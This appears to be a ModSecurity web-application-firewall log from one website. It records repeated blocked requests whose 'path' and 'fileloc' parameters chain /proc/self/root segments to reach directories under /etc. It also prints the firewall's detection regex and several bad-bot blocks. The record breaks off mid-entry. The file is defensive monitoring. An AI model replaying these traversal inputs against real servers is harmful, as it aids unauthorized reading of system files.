[Mon Mar 16 09:30:25.219880 2026] [:error] [pid 10831:tid 140411725141760] [client 74.7.243.203:48498] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf34Y6lpbStxTqkSktbzwAAAkI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:30:40.059715 2026] [:error] [pid 10772:tid 140411674785536] [client 74.7.228.16:39626] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abf38P9ocpUE4ed4uDzZVwAAAgg"]
[Mon Mar 16 09:30:43.669055 2026] [:error] [pid 21533:tid 140411683178240] [client 74.7.243.203:38564] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf383jZBu2q05ozVU9CZwAAAUc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:30:48.058987 2026] [:error] [pid 32654:tid 140411708356352] [client 74.7.243.203:59846] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf3-AlT9VtDQc7bgUyYEgAAAQQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:30:50.507019 2026] [:error] [pid 11972:tid 140411540502272] [client 74.7.243.203:59852] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf3-pqj1wV0Si-OkefVvQAAABg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:31:07.042925 2026] [:error] [pid 21806:tid 140411741927168] [client 74.7.243.203:58358] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf4C9SswJuvopo3lOhMvwAAAIA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:32:01.355746 2026] [:error] [pid 21946:tid 140411599251200] [client 74.7.243.203:43448] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf4QXbQATo66fKoS7w5ZQAAANE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:32:02.702523 2026] [:error] [pid 10651:tid 140411565680384] [client 74.7.243.203:41150] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf4QrysWC90G-1nBrAxsgAAAZU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:32:05.055308 2026] [:error] [pid 21806:tid 140411632822016] [client 74.7.243.203:41152] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf4RdSswJuvopo3lOhMyQAAAI0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:32:11.251215 2026] [:error] [pid 32654:tid 140411590858496] [client 74.7.243.203:41156] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf4SwlT9VtDQc7bgUyYaAAAARI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:32:37.540467 2026] [:error] [pid 21806:tid 140411641214720] [client 74.7.243.203:43860] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf4ZdSswJuvopo3lOhM4AAAAIw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:32:40.074743 2026] [:error] [pid 10772:tid 140411733534464] [client 74.7.243.203:46108] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf4aP9ocpUE4ed4uDzZaQAAAgE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:32:43.470950 2026] [:error] [pid 10709:tid 140411582465792] [client 74.7.243.203:53686] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf4axXjF1vJNtV6CWrlvgAAAdM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:33:04.915155 2026] [:error] [pid 10709:tid 140411548894976] [client 74.7.243.203:53694] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf4gBXjF1vJNtV6CWrl0wAAAdc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:33:13.383331 2026] [:error] [pid 11972:tid 140411741927168] [client 74.7.244.31:54500] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abf4iZqj1wV0Si-OkefWKQAAAAA"]
[Mon Mar 16 09:33:14.104456 2026] [:error] [pid 21806:tid 140411641214720] [client 74.7.243.203:39982] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rc0.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf4itSswJuvopo3lOhM7gAAAIw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:33:15.411309 2026] [:error] [pid 21946:tid 140411632822016] [client 74.7.243.203:50994] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf4i3bQATo66fKoS7w5bQAAAM0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:33:16.982308 2026] [:error] [pid 11972:tid 140411624429312] [client 74.7.243.203:50996] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf4jJqj1wV0Si-OkefWKgAAAA4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:33:18.271498 2026] [:error] [pid 10772:tid 140411649607424] [client 74.7.243.203:51008] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf4jv9ocpUE4ed4uDzZbwAAAgs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:33:19.423757 2026] [:error] [pid 21533:tid 140411708356352] [client 74.7.243.203:51010] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf4j3jZBu2q05ozVU9ChQAAAUQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:33:20.711030 2026] [:error] [pid 10709:tid 140411624429312] [client 74.7.243.203:59932] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf4kBXjF1vJNtV6CWrl1gAAAc4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:33:21.991042 2026] [:error] [pid 21946:tid 140411641214720] [client 74.7.243.203:59946] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf4kXbQATo66fKoS7w5cAAAAMw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:33:29.410214 2026] [:error] [pid 10709:tid 140411599251200] [client 74.7.243.203:59956] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id 